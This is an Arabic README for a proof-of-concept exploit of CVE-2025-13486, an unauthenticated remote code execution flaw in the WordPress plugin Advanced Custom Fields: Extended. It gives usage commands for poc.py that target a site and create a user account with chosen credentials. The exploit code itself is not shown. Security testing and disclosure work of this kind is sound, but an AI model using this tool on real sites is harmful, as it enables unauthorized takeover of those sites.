
POC لـ CVE-2025-13486
هذا إثبات مفهوم (PoC) لاستغلال ثغرة CVE-2025-13486، وهي ثغرة تنفيذ كود عن بُعد في إضافة ووردبريس Advanced Custom Fields: Extended (ACFE).
توجد هذه الثغرة في إصدارات ACFE من 0.9.0.5 إلى 0.9.1.1، مما يسمح للمهاجمين غير المصادقين بتنفيذ دوال PHP عشوائية عبر إجراء AJAX acfe/form/render_form_ajax. تستخدم الإضافة الدالة call_user_func_array() مع إدخال يقدمه المستخدم دون تحقق مناسب.
print_r (غير مدمر)pip install requests
python poc.py -u http://target-site.com --verify
# With random credentials (displayed after execution)
python poc.py -u http://target-site.com
# With custom credentials
python poc.py -u http://target-site.com --user admin123 --password P@ssw0rd! --email [email protected]
-u, --url Target WordPress URL (required)
--verify Only verify vulnerability (safer, uses print_r)
--user Username to create (default: random)
--password Password to set (default: random)
--email Email address to set (default: random)
يُقدَّم إثبات المفهوم هذا لأغراض تعليمية واختبار أمني مصرح به فقط. الوصول غير المصرح به إلى أنظمة الحاسوب غير قانوني. احصل دائمًا على التصريح المناسب قبل الاختبار.